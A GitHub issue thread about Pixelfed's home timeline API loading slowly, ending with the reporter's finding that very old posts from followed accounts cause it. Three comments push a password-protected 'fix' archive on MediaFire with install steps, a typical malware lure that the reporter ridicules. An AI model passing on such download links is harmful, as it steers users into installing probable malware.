### ISSUE TITLE
Loading home page timeline very slow

### ISSUE THREAD

**Issue by magostinelli** [pixelfed/pixelfed#5275]
Some of users have the following problem on this api:
/api/v1/timelines/home?min_id=1&limit=6&_pe=1

![immagine](https://github.com/user-attachments/assets/e77767cf-6d18-4519-b89e-0f89dbcf46b3)

Other users doens't have the problem

**Comment by tonywk** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by scppuna** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by magostinelli** [comment]
Yes, of course! Do you want also the password of my bank account? :-)

**Comment by magostinelli** [comment]
Update: We discovered that the problem occurs when there are very old post from people you follow.
So if a user has some recent post to view in the timeline everything is fast, instead (timeline with very old post) is too slow, as described in the image.
